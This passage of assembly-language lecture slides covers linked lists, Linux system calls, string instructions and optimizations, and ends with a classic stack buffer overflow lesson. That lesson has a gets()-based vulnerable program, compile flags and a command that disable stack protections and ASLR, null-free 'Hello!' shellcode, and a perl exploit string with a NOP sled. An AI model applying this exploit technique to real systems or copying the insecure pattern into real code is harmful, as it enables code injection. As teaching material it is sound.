\item In the {\ttfamily main} entry point with libc, {\ttfamily argc, **argv} will be on the stack after the return address to libc, we have to dereference to get to the args!
\end{itemize}
\begin{gascode}
.section .text
.global main
main:
pushl %ebp
movl %esp, %ebp
# return address to libc is at %ebp+4
# argc is at %ebp+8, **argv is at %ebp+12
# argv[0] = *(*(%ebp+12)), argv[1] = *(*(%ebp+12)+4)
\end{gascode}
\end{frame}
\section{Program Example: Linked List}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S)}
\mvs
\begin{gascode}
.section .text
.global main
# struct list { int data; struct list *next; };
#
# [ int data; ][ list *next; ] 8 bytes total
# \ 4 bytes / \ 4 bytes /
# list *list_alloc(int data);
list_alloc:
pushl $8 # %eax = malloc(8);
call malloc
addl $4, %esp
testl %eax, %eax # if (%eax == NULL)
jz fatal # goto fatal;
movl 4(%esp), %ecx
movl %ecx, (%eax) # %eax->data = data
movl $0, 4(%eax) # %eax->next = 0
ret
# Dirty error handling
fatal:
jmp fatal
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Continued}
\mvs
\begin{gascode}
# void list_add(list *head, int data);
list_add:
push %ebp
mov %esp, %ebp
subl $4, %esp # list *n;
pushl 12(%ebp) # %eax = list_alloc(data);
call list_alloc
addl $4, %esp
mov %eax, -4(%ebp) # n = %eax;
mov 8(%ebp), %eax # %eax = head
traverse_add:
cmpl $0, 4(%eax) # if (%eax->next == NULL)
jz at_end_add # goto at_end_add;
movl 4(%eax), %eax # %eax = %eax->next
jmp traverse_add # Loop
at_end_add:
movl -4(%ebp), %ecx # %ecx = n
movl %ecx, 4(%eax) # %eax->next = %ecx
mov %ebp, %esp
pop %ebp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Continued}
\mvs
\begin{gascode}
# void list_dump(list *head);
list_dump:
push %ebp
mov %esp, %ebp
pushl %ebx # Save %ebx
movl 8(%ebp), %ebx # %ebx = head
traverse_dump:
testl %ebx, %ebx # if (%ebx == NULL)
jz at_end_dump # goto at_end_dump;
movl (%ebx), %ecx # %ecx = %ebx->data
pushl %ecx # printf("%d\n", %ecx)
pushl $fmtStr
call printf
addl $8, %esp
movl 4(%ebx), %ebx # %ebx = %ebx->next
jmp traverse_dump # Loop
at_end_dump:
pop %ebx # Restore %ebx
mov %ebp, %esp
pop %ebp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Continued}
\mvs
\begin{gascode}
main:
pushl $86 # %eax = list_alloc(86);
call list_alloc
addl $4, %esp
movl %eax, head # head = %eax
pushl $75 # list_add(head, 75);
pushl head
call list_add
addl $8, %esp
pushl $309 # list_add(head, 309);
pushl head
call list_add
addl $8, %esp
pushl head # list_dump(head);
call list_dump
addl $4, %esp
movl $0, %eax # Return 0
ret
.section .data
head: .long 0
fmtStr: .ascii "%d\n\0"
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Runtime}
\mvs
\begin{textcode}
$ as linked_list.S -o linked_list.o
$ gcc linked_list.o -o linked_list
$ ./linked_list
86
75
309
$
\end{textcode}
\end{frame}
\section*{Lingering Questions?}
\section{Topic 10: System Calls}
\begin{frame}[fragile,t]
\frametitle{The User Program Condition}
\begin{itemize}
\item Monolithic kernel like Linux completely sandboxes a user program
\begin{itemize}
\item User program executes at a lower CPU privilege
\item Virtual memory hides other programs, restricts access to kernel memory and memory-mapped I/O
\end{itemize}
\vs \vs
\pause
\item User program can effectively only do pure computation and manipulate user memory mapped by the OS
\end{itemize}
\pause
\begin{figure}
\centering
\includegraphics[height=0.40\paperheight]{figures/hamster.jpg}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Interrupts and System Calls}
\begin{itemize}
\item CPU is capable of servicing hardware and software interrupts
\begin{itemize}
\item timer tick, DMA exchange complete, divide-by-zero
\end{itemize}
\pause
\item External interrupts can happen asynchronously --- are not polled --- and \textbf{interrupt} current program
\pause
\item CPU saves current state in an architecture-specific way, switches to privileged mode, and jumps to the interrupt handler in the kernel
\pause
\item Software interrupt, instruction {\ttfamily int <number>}, provides a mechanism to make a request to the kernel to do something user program cannot
\begin{itemize}
\item System call
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{System Call Interface}
\begin{figure}
\centering
\includegraphics[height=0.65\paperheight]{figures/monolithic.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linux System Calls}
\begin{itemize}
\item Currently 346 system calls
\item Common ones are {\ttfamily exit(), read(), write(), open(), close(), ioctl(), fork(), execve()}, etc.
\pause
\begin{itemize}
\item Get more obscure as the system call number goes up
\item {\ttfamily less /usr/include/asm/unistd\_32.h}
\item {\ttfamily man 2 syscalls}
\end{itemize}
\pause
\item Operating System specific convention for making a system call
\pause
\item On Linux it is:
\begin{itemize}
\item system call number in {\ttfamily \%eax}
\item arguments in order {\ttfamily \%ebx, \%ecx, \%edx, \%esi, \%edi}
\item invoke software interrupt with vector {\ttfamily 0x80}: {\ttfamily int \$0x80}
\item return value in {\ttfamily \%eax}
\end{itemize}
\pause
\item All registers preserved except for {\ttfamily \%eax}
\item Passes arguments in registers, not the stack like {\ttfamily cdecl}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linux System Calls Reference}
\begin{itemize}
\item \url{http://syscalls.kernelgrok.com/}
\end{itemize}
\begin{figure}
\centering
\includegraphics[height=0.50\paperheight]{figures/syscalls.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S)}
\mvs
\begin{gascode}
.section .text
_start:
# syscall open("foo", O_CREAT | O_WRONLY, 0644);
movl $0x05, %eax
movl $filename, %ebx
movl $0x41, %ecx
movl $0644, %edx
int $0x80
# fd in %eax from open(), move it to %ebx for write()
movl %eax, %ebx
# syscall write(fd, message, messageLen);
movl $0x04, %eax
# fd in %ebx from above
movl $message, %ecx
movl $messageLen, %edx
int $0x80
# syscall close(fd);
movl $0x06, %eax
# fd still in %ebx
int $0x80
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S)}
\mvs
\begin{gascode}
# syscall exit(0);
movl $0x01, %eax
movl $0x0, %ebx
int $0x80
.section .data
filename: .ascii "foo\0"
message: .ascii "Hello World!\n"
.equ messageLen, . - message
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S) Runtime}
\mvs
\begin{textcode}
$ as example-syscall.S -o example-syscall.o
$ ld example-syscall.o -o example-syscall
$ ./example-syscall
$ cat foo
Hello World!
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-syscall.S -o example-syscall.o
$ ld example-syscall.o -o example-syscall
$ objdump -D example-syscall
Disassembly of section .text:
08048074 <_start>:
8048074: b8 05 00 00 00 mov $0x5,%eax
8048079: bb b0 90 04 08 mov $0x80490b0,%ebx
804807e: b9 41 00 00 00 mov $0x41,%ecx
8048083: ba a4 01 00 00 mov $0x1a4,%edx
8048088: cd 80 int $0x80
804808a: 89 c3 mov %eax,%ebx
804808c: b8 04 00 00 00 mov $0x4,%eax
8048091: b9 b4 90 04 08 mov $0x80490b4,%ecx
8048096: ba 0d 00 00 00 mov $0xd,%edx
804809b: cd 80 int $0x80
804809d: b8 06 00 00 00 mov $0x6,%eax
80480a2: cd 80 int $0x80
80480a4: b8 01 00 00 00 mov $0x1,%eax
80480a9: bb 00 00 00 00 mov $0x0,%ebx
80480ae: cd 80 int $0x80
Disassembly of section .data:
080490b0 <filename>:
80490b0: 66 6f outsw %ds:(%esi),(%dx)
...
\end{customobjdumpcode}
\end{frame}
\section{Program Example: tee}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S)}
\begin{gascode}
# Tee (tee.S)
.section .text
_start:
push %ebp
mov %esp, %ebp
subl $4, %esp # int fd; on the stack
cmpl $2, 4(%ebp) # if (argc != 2)
jne tee_usage # goto tee_usage;
tee_open:
# syscall open(argv[1], O_CREAT|O_WRONLY|O_TRUNC, 0644);
movl $0x05, %eax
movl 12(%ebp), %ebx
movl $0x241, %ecx
movl $0644, %edx
int $0x80
cmpl $0, %eax # if (%eax < 0)
jl tee_exit # goto tee_exit;
movl %eax, -4(%ebp) # fd = %eax
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S) Continued}
\begin{gascode}
tee_loop:
# Read from input: syscall read(0, &c, 1);
movl $3, %eax
movl $0, %ebx
movl $c, %ecx
movl $1, %edx
int $0x80
cmpl $1, %eax # if (%eax < 1)
jl tee_exit # goto tee_exit;
# Write to file: syscall write(fd, &c, 1);
movl $4, %eax
movl -4(%ebp), %ebx
movl $c, %ecx
movl $1, %edx
int $0x80
# Write to stdout: syscall write(1, &c, 1);
movl $4, %eax
movl $1, %ebx
movl $c, %ecx
movl $1, %edx
int $0x80
jmp tee_loop # Loop
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S) Continued}
\begin{gascode}
tee_usage:
# syscall write(1, usageStr, usageStrLen);
movl $4, %eax
movl $1, %ebx
movl $usageStr, %ecx
movl $usageStrLen, %edx
int $0x80
tee_exit:
# syscall exit(0);
movl $1, %eax
movl $0, %ebx
int $0x80
.section .rodata
# Usage string and length
usageStr: .ascii "./tee <file>\n"
.equ usageStrLen, . - usageStr
.section .bss
# Read character var
.comm c, 1
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S) Runtime}
\begin{textcode}
$ as tee.S -o tee.o
$ ld tee.o -o tee
# Count total number of syscalls while generating a "CSV syscall,no" list
$ egrep "NR.*$" -o /usr/include/asm/unistd_32.h |
cut -b 4- | sed 's/ /,/' | ./tee syscalls.txt | wc
346 346 4604
$ cat syscalls.txt
restart_syscall,0
exit,1
fork,2
read,3
write,4
open,5
close,6
waitpid,7
creat,8
link,9
unlink,10
...
\end{textcode}
\end{frame}
\section{Advanced Topic 11: Role of libc}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily libc} for library functions and system calls}
\begin{itemize}
\item {\ttfamily libc} provides optimized string, formatting, pattern matching, math, date and time, etc. computation functions
\item {\ttfamily libc} wraps system calls and provides more platform-independent data structures and interfaces
\begin{itemize}
\item file streams: {\ttfamily FILE *, fopen(), fclose(), fread(), fwrite()}
\item sockets: {\ttfamily socket(), bind(), accept(), send(), recv()}
\end{itemize}
\item In other words, {\ttfamily libc} implements the C library of the POSIX standard
\vs
\pause
\item You can choose not to link with libc, only use syscalls, and implement the other functionality yourself (interesting challenge)
\vs
\pause
\item Some I/O operations will be more efficient through {\ttfamily libc} than direct system calls, due to buffering in user space
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily libc} for dynamic memory management (heap)}
\begin{columns}[T]
\column{0.7\textwidth}
\begin{itemize}
\item Operating system allocates heap memory for user program
\item {\ttfamily libc} {\ttfamily malloc()} and {\ttfamily free()} manage allocations, deallocations, and fragmentation of the heap
\item Heap grows up, stack grows down
\end{itemize}
\column{0.3\textwidth}
\includegraphics[height=0.70\paperheight]{figures/memlayoutvm.png}
\end{columns}
\end{frame}
\section{Advanced Topic 12: x86 String Operations}
\begin{frame}[fragile,t]
\frametitle{Some Overlooked Registers}
\begin{figure}
\centering \includegraphics[width=0.85\textwidth]{figures/386state.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Special Instructions for {\ttfamily \%esi} and {\ttfamily \%edi}}
\begin{itemize}
\item We've seen {\ttfamily push} and {\ttfamily pop} instructions which manipulate {\ttfamily \%esp} in a special way
\item Special string instructions exist for {\ttfamily \%esi} and {\ttfamily \%edi}
\begin{itemize}
\item {\ttfamily \%esi} is the source string pointer
\item {\ttfamily \%edi} is the destination string pointer
\end{itemize}
\pause
\item {\ttfamily movs} does {\ttfamily *\%edi++ = *\%esi++}
\item {\ttfamily cmps} does {\ttfamily cmp \%esi++, \%edi++}
\item {\ttfamily scas} does {\ttfamily cmp \%eax, \%edi++}
\item {\ttfamily lods} does {\ttfamily mov \%esi++, \%eax}
\item {\ttfamily stos} does {\ttfamily mov \%eax, \%edi++}
\pause
\vs
\item Instruction size suffix {\ttfamily b, w, l} determines copy, compare, move size and post-increment amount (1, 2, 4)
\item DF flag in {\ttfamily \%eflags} determines if it is a \\ post-increment (DF=0) or post-decrement (DF=1)
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 1 of String Instructions (example-string1.S)}
\begin{gascode}
.section .text
cld # Clear DF, we want to post-increment
# Load str1 with 8 of 0xff
movl $str1, %edi # Set up our string destination pointer
# Load the first four a byte at a time
movb $0xFF, %al
stosb # *(%edi++) = %al
stosb # *(%edi++) = %al
stosb # *(%edi++) = %al
stosb # *(%edi++) = %al
# Load the last four with a single dword
movl $0xFFFFFFFF, %eax
stosl # *(%edi) = %eax, %edi += 4
# Copy str1 to str2
movl $str1, %esi # str1 in the source
movl $str2, %edi # str2 in the destination
# Two dword moves copy all 8 bytes
movsl
movsl
# Done!
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 1 of String Instructions (example-string1.S) Continued}
\begin{gascode}
.section .bss
.comm str1, 8
.comm str2, 8
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Repeat Prefix for String Instructions}
\begin{itemize}
\item String instructions can be prefixed by \\ {\ttfamily rep, repe/repz, repne/repnz}
\item {\ttfamily rep <string instr>}
\begin{itemize}
\item repeat the string instruction until {\ttfamily \%ecx} is 0
\end{itemize}
\item {\ttfamily repe/repz <string instr>}
\begin{itemize}
\item repeat the string instruction until {\ttfamily \%ecx} is 0 or ZF flag is 0
\end{itemize}
\item {\ttfamily repne/repnz <string instr>}
\begin{itemize}
\item repeat the string instruction until {\ttfamily \%ecx} is 0 or ZF flag is 1
\end{itemize}
\item {\ttfamily \%ecx} automatically decremented for you
\vs
\pause
\item Simple, inefficient {\ttfamily memset()}: {\ttfamily rep stosb}
\item Simple, inefficient {\ttfamily memcpy()}: {\ttfamily rep movsb}
\item Simple, inefficient {\ttfamily strlen()}: {\ttfamily repne scasb}
\item Simple, inefficient {\ttfamily strncmp()}: {\ttfamily repe cmpsb}
\item Can be better optimized for memory alignment and scan/copy size
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 2 of String Instructions (example-string2.S)}
\begin{gascode}
.section .text
.global main
main:
# memset(str, 'A', 48);
pushl $48
pushl $'A
pushl $str
call asm_memset
addl $12, %esp
# str[48] = '\n'; str[49] = '\0';
movb $'\n', str+48
movb $0, str+49
# printf(str);
pushl $str
call printf
addl $4, %esp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 2 of String Instructions (example-string2.S) Continued}
\begin{gascode}
# void *memset(void *s, int c, size_t n);
asm_memset:
pushl %edi
pushl %ebp
movl %esp, %ebp
movl 12(%ebp), %edi # %edi = s
movl 16(%ebp), %eax # %eax = c
movl 20(%ebp), %ecx # %ecx = n
rep stosb
movl 12(%ebp), %eax # %eax = s
movl %ebp, %esp
popl %ebp
popl %edi
ret
.section .bss
.comm str, 50
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 2 of String Instructions (example-string2.S) Runtime}
\begin{textcode}
$ as example-string2.S -o example-string2.o
$ gcc example-string2.o -o example-string2
$ ./example-string2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Back to the opening glibc strlen example}
\begin{customobjdumpcode}
080483cd <glibc_strlen>:
80483cd: 57 push %edi
80483ce: b9 ff ff ff ff mov $0xffffffff,%ecx
80483d3: b8 00 00 00 00 mov $0x0,%eax
80483d8: 8b 7c 24 08 mov 0x8(%esp),%edi
80483dc: fc cld
80483dd: f2 ae repnz scas %es:(%edi),%al
80483df: b8 fe ff ff ff mov $0xfffffffe,%eax
80483e4: 29 c8 sub %ecx,%eax
80483e6: 5f pop %edi
80483e7: c3 ret
\end{customobjdumpcode}
\begin{itemize}
\item Trick is to load {\ttfamily \%ecx} with -1 or {\ttfamily 0xFFFFFFFF}
\item Assumption: string is not longer than 4 gigabytes
\item Reasonable assumption on 32-bit system
\end{itemize}
\end{frame}
\section{Advanced Topic 13: Three Simple Optimizations}
\begin{frame}[fragile,t]
\frametitle{Three Basic Optimizations}
\mvs
\begin{itemize}
\item Clear a register with {\ttfamily xor} rather than a {\ttfamily mov}
\vspace{0.5em}
\begin{customobjdumpcode}
0: b8 00 00 00 00 movl $0x0,%eax
0: 31 c0 xorl %eax,%eax
\end{customobjdumpcode}
\vspace{0.5em}
\pause
\item Use {\ttfamily lea} for general purpose arithmetic when applicable
\begin{itemize}
\item {\ttfamily lea} calculates the indirect memory address \\ {\ttfamily \%reg + \%reg*(1,2,4,8) + \$constant} \\ and stores the effective address without dereferencing memory
\end{itemize}
\vspace{0.5em}
\begin{gascode}
# Compute expression: %eax + %ebx*2 + 10
leal 10(%eax, %ebx, 2), %eax
\end{gascode}
\pause
\item Use a more efficient loop structure when possible
\vspace{-1.0em}
\begin{columns}[T]
\centering
\column{0.4\textwidth}
\begin{gascode*}{fontsize=\fontsize{8}{8}}
# for (i = 0; i < 10; i++) { ; }
xorl %ecx, %ecx
loop:
cmpl $10, %ecx
jge loop_done
nop
incl %ecx
jmp loop
loop_done:
\end{gascode*}
\column{0.4\textwidth}
\begin{gascode*}{fontsize=\fontsize{8}{8}}
# i = 10; do { ; } while(--i != 0);
movl $10, %ecx
loop:
nop
decl %ecx
jnz loop
\end{gascode*}
\end{columns}
\end{itemize}
\end{frame}
\section{Advanced Topic 14: x86 Extensions}
\begin{frame}[fragile,t]
\frametitle{Overview}
\begin{itemize}
\item Separate instruction sets
\item x87 floating point unit
\begin{itemize}
\item 80-bit double-extended precision floating point registers
\item add, subtract, multiply, divide, square root, round, cosine, sine, compare, load/store, etc. for floating point numbers
\end{itemize}
\pause
\item Single Instruction Multiple Data (SIMD) instruction sets \\ like MMX, SSE, SSE2, SSE3, SSE4, ...
\begin{itemize}
\item Single instruction carries out an operation (add, subtract, etc.) on multiple data blocks, a vector
\item MMX was a SIMD instruction set for integers
\pause
\item SSE is SIMD instruction set for integers and floating point
\pause
\item SSE1 had 32-bit single precision floating point support
\item SSE2 added 64-bit double precision floating point support
\pause
\item SSE registers are {\ttfamily \%xmm0 - \%xmm7}, each 128-bit
\item SSE instructions can treat each register as multiple floats, doubles, chars, shorts, etc.
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Scalar versus SIMD}
\begin{figure}
\includegraphics[width=\textwidth]{figures/simd.png}
\footnote{\url{http://software.intel.com/en-us/articles/introduction-to-intel-advanced-vector-extensions/}}
\end{figure}
\end{frame}
\section{Advanced Topic 15: Stack-based Buffer Overflows}
\begin{frame}[fragile,t]
\frametitle{Classic Insecure Example in C (example-insecure.c)}
\begin{ccode}
#include <stdio.h>
void get_input(void) {
char buff[100];
gets(buff);
}
int main(void) {
printf("input: ");
get_input();
return 0;
}
\end{ccode}
\vs
\pause
\begin{textcode}
$ gcc -fno-stack-protector -z execstack example-insecure.c
-o example-insecure
\end{textcode}
We'll build this with the GCC stack protector disabled and executable stack (for reasons explained in a few slides)
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Disassembly of {\ttfamily get\_input()}}
\mvs
\begin{ccode}
void get_input(void) {
char buff[100];
gets(buff);
}
\end{ccode}
\vs
\begin{customobjdumpcode}
$ objdump -d example-insecure
...
08048414 <get_input>:
# Function prologue
8048414: 55 push %ebp
8048415: 89 e5 mov %esp,%ebp
# Space allocated on the stack for buff[100]
8048417: 81 ec 88 00 00 00 sub $0x88,%esp
# Address of buff in %eax
804841d: 8d 45 94 lea -0x6c(%ebp),%eax
# Pushing &buff onto the stack
8048420: 89 04 24 mov %eax,(%esp)
# gets(buff);
8048423: e8 f8 fe ff ff call 8048320 <gets@plt>
# Function epilogue
8048428: c9 leave
8048429: c3 ret
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Stack Frame of {\ttfamily get\_input()}}
\mvs
\begin{gascode}
# Function prologue
push %ebp
mov %esp,%ebp
# Space allocated on the stack for buff[100]
sub $0x88,%esp
# Address of buff in %eax
lea -0x6c(%ebp),%eax
# Pushing &buff onto the stack
mov %eax,(%esp)
# gets(buff);
call 8048320 <gets@plt>
# Function epilogue
leave
ret
# Stack frame right before call to gets()
# | ... |
# | retaddr |
# | saved ebp |
# | buf |
# | buf |
# .
# | buf |
# | buf |
# | &buf | <- %esp
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Buffer Overflow}
\mvs
\begin{itemize}
\item With a well-crafted buffer, we can inject instructions into the buffer on the stack, as well as an over-written return address to those instructions
\item When {\ttfamily get\_input()} returns, it will return into our injected instructions
\end{itemize}
\begin{figure}
\centering
\includegraphics[height=0.55\paperheight]{figures/bufferoverflow.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Overwriting the Return Address}
\begin{itemize}
\item But how do we pick the return address? What is the address of stuff on the stack anyway?
\pause
\item Let's write a small program to find out...
\end{itemize}
\begin{ccode}
#include <stdio.h>
int main(void) {
char c;
printf("%p\n", &c);
return 0;
}
\end{ccode}
\begin{textcode}
$ gcc example-addrstack.c -o example-addrstack
$ ./example-addrstack
0xbfe3d16f
$ ./example-addrstack
0xbfdef6ff
$ ./example-addrstack
0xbfefbecf
\end{textcode}
\pause
\begin{itemize}
\item It's changing every time we run it!
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Address Space Layout Randomization (ASLR)}
\begin{itemize}
\item We just witnessed the effect of ASLR, which randomly initializes the position of code, libraries, heap, and stack in the user program's address space
\item However, the addresses were all relatively close to each other, so there is an opportunity for guessing... (16 bits of guessing on 32-bit)
\pause
\item For our purposes, let's turn off ASLR.
\end{itemize}
\vs
\begin{textcode}
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ ./example-addrstack
0xbffff28f
$ ./example-addrstack
0xbffff28f
$ ./example-addrstack
0xbffff28f
\end{textcode}
\begin{itemize}
\item Now we have an idea of where variables on the stack live
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Shellcode}
\begin{itemize}
\item Next step is to write our instructions to inject
\item Often called shellcode, because it often spawns a privileged shell
\pause
\vs\vs
\item Must be position-independent
\begin{itemize}
\item Code cannot rely on absolute addresses for its data, since we're not sure \textbf{exactly} where it will live on the stack, just roughly
\end{itemize}
\pause
\item Must contain no newlines, and in other cases, no null bytes
\begin{itemize}
\item Otherwise {\ttfamily gets()} will stop reading input prematurely
\end{itemize}
\pause
\vs
\item Let's make it do {\ttfamily write(1, "Hello!", 6);} and {\ttfamily exit(0);}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 1 (example-shellcode1.S)}
\mvs
\begin{gascode}
_start:
# Clever way to get string address into %ecx
jmp get_str_addr
got_str_addr:
popl %ecx
# write(1, "Hello!", 6);
movl $0x04, %eax
movl $0x01, %ebx
movl $6, %edx
int $0x80
# exit(1);
movl $0x01, %eax
# %ebx is still 1 from write() above, so the exit status is 1
int $0x80
get_str_addr:
call got_str_addr
.ascii "Hello!"
\end{gascode}
\begin{textcode}
$ as example-shellcode1.S -o example-shellcode1.o
$ ld example-shellcode1.o -o example-shellcode1
$ ./example-shellcode1
Hello!$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 1 (example-shellcode1.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ objdump -D example-shellcode1
Disassembly of section .text:
08048054 <_start>:
8048054: eb 19 jmp 804806f <get_str_addr>
08048056 <got_str_addr>:
8048056: 59 pop %ecx
8048057: b8 04 00 00 00 mov $0x4,%eax
804805c: bb 01 00 00 00 mov $0x1,%ebx
8048061: ba 06 00 00 00 mov $0x6,%edx
8048066: cd 80 int $0x80
8048068: b8 01 00 00 00 mov $0x1,%eax
804806d: cd 80 int $0x80
0804806f <get_str_addr>:
804806f: e8 e2 ff ff ff call 8048056 <got_str_addr>
8048074: 48 dec %eax
8048075: 65 gs
8048076: 6c insb (%dx),%es:(%edi)
8048077: 6c insb (%dx),%es:(%edi)
8048078: 6f outsl %ds:(%esi),(%dx)
8048079: 21 .byte 0x21
\end{customobjdumpcode}
\begin{itemize}
\item We want to get rid of those null bytes...
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 2 (example-shellcode2.S)}
\mvs
\begin{gascode}
_start:
# Clever way to get string address into %ecx
jmp get_str_addr
got_str_addr:
popl %ecx
# write(1, "Hello!", 6);
xorl %eax, %eax
xorl %ebx, %ebx
xorl %edx, %edx
incl %ebx
addb $4, %al
addb $6, %dl
int $0x80
# exit(1);
xorl %eax, %eax
incl %eax
# %ebx is still 1 from write() above, so the exit status is 1
int $0x80
get_str_addr:
call got_str_addr
.ascii "Hello!"
\end{gascode}
\begin{textcode}
$ as example-shellcode2.S -o example-shellcode2.o && ld ...
$ ./example-shellcode2
Hello!$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 2 (example-shellcode2.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ objdump -D example-shellcode2
Disassembly of section .text:
08048054 <_start>:
8048054: eb 14 jmp 804806a <get_str_addr>
08048056 <got_str_addr>:
8048056: 59 pop %ecx
8048057: 31 c0 xor %eax,%eax
8048059: 31 db xor %ebx,%ebx
804805b: 31 d2 xor %edx,%edx
804805d: 43 inc %ebx
804805e: 04 04 add $0x4,%al
8048060: 80 c2 06 add $0x6,%dl
8048063: cd 80 int $0x80
8048065: 31 c0 xor %eax,%eax
8048067: 40 inc %eax
8048068: cd 80 int $0x80
0804806a <get_str_addr>:
804806a: e8 e7 ff ff ff call 8048056 <got_str_addr>
804806f: 48 dec %eax
8048070: 65 gs
8048071: 6c insb (%dx),%es:(%edi)
8048072: 6c insb (%dx),%es:(%edi)
8048073: 6f outsl %ds:(%esi),(%dx)
8048074: 21 .byte 0x21
\end{customobjdumpcode}
\vspace{-0.5em}
\begin{itemize}
\item No null bytes or newlines!
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Preparing our Payload}
\begin{itemize}
\item Reading off the {\ttfamily objdump} disassembly, we can write out the instructions as an ASCII string with escape characters
\end{itemize}
\begin{textcode}
"\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43\x04\x04\x80\xc2\x06\xcd
\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff\x48\x65\x6c\x6c\x6f\x21"
\end{textcode}
\pause
\begin{itemize}
\item So the plan is to pass a string to the insecure example with the shellcode, enough A's to overflow the buff, and a new return address
\pause
\item But if the return address isn't exactly right, it won't work!
\pause
\item We can make it more robust by adding a \textbf{nop-sled}: a bunch of nops preceding our shellcode
\item Even if our guessed return address is off by a couple of bytes, as long as the CPU returns to somewhere within the nop-sled, execution will slide down to our real injected instructions
\item Machine code for a {\ttfamily nop} is {\ttfamily 0x90}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{The Actual Exploit...}
\mvs
\begin{itemize}
\item First, find out how many A's it takes to break it...
\end{itemize}
\begin{textcode}
$ perl -e 'print "A" x 107' | ./example-insecure
input:
$ perl -e 'print "A" x 108' | ./example-insecure
input:
Segmentation fault
$
\end{textcode}
\pause
\begin{itemize}
\item Then, use gdb to find out the number of A's to start overwriting the return address...
\end{itemize}
\begin{textcode}
$ gdb example-insecure
...
<input 113 A's>
Program received signal SIGSEGV, Segmentation fault.
0x08040041 in ?? ()
\end{textcode}
\begin{itemize}
\item Lowest byte of return address, now in {\ttfamily \%eip}, was overwritten by an {\ttfamily 'A'}, or {\ttfamily 0x41}.
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{The Actual Exploit... (example-insecure\_exploit.sh) Continued}
\mvs
\begin{textcode*}{fontsize=\fontsize{8}{8}}
Prepare small nop-sled, shellcode, A's, and return address that is
116 characters long.
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x80\xf2\xff\xbf"' | wc
0 1 116
\end{textcode*}
\pause
\begin{textcode*}{fontsize=\fontsize{8}{8}}
Guess at the return address, starting at 0xbffff280:
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x80\xf2\xff\xbf"' | ./example-insecure
input:
Segmentation fault
\end{textcode*}
\pause
\begin{textcode*}{fontsize=\fontsize{8}{8}}
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x70\xf2\xff\xbf"' | ./example-insecure
input:
